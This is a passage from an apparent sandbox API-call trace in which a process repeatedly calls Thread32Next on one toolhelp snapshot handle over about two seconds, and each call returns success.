[0239.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.904] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.461] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.462] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.463] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.464] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.465] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.466] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.521] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.522] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.523] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.524] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.525] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.526] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.527] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.528] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.529] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.530] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.531] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.532] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.533] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.534] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.535] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.536] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.537] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.538] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.539] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.540] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.541] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.542] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.543] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.544] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.545] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.546] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.547] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.548] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.549] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.550] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.551] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.552] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.760] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.761] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.762] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.765] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.766] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.767] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.768] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.769] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.772] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.773] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.774] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.775] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.776] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.777] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.778] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.779] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.780] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.781] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.782] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.783] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.784] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.785] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.786] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.787] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.788] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0240.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.029] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.030] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.030] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.031] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.032] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.033] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.034] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.035] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.036] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.037] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.038] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.039] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.040] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.041] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.042] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.043] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.044] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.045] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.046] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.046] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.047] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.048] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.049] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.050] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.051] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.052] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.053] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.054] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.055] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.056] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.057] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.058] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.060] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.061] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.062] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.063] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.263] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.264] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.265] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.266] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.267] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.268] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.269] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.270] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.271] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.272] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.273] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.274] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.275] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.276] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.277] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.279] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.292] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.555] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.556] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.557] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.558] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.559] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.560] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.561] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.562] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.563] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.564] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.565] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.566] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.567] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.568] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.569] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.570] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.571] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.572] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.573] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.575] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.576] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.577] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.578] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.579] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.580] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.581] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.582] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.583] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.585] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.586] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.587] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.588] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.589] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.590] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.591] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.886] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.887] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.888] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.889] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.890] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.891] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.892] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.894] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.895] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.896] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.897] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.898] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.899] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.900] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.901] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.902] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.903] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.905] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.906] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.907] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.908] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.909] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.910] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.911] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.912] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.913] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0241.914] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0242.144] Thread32Next (hSnapshot=0x17c, 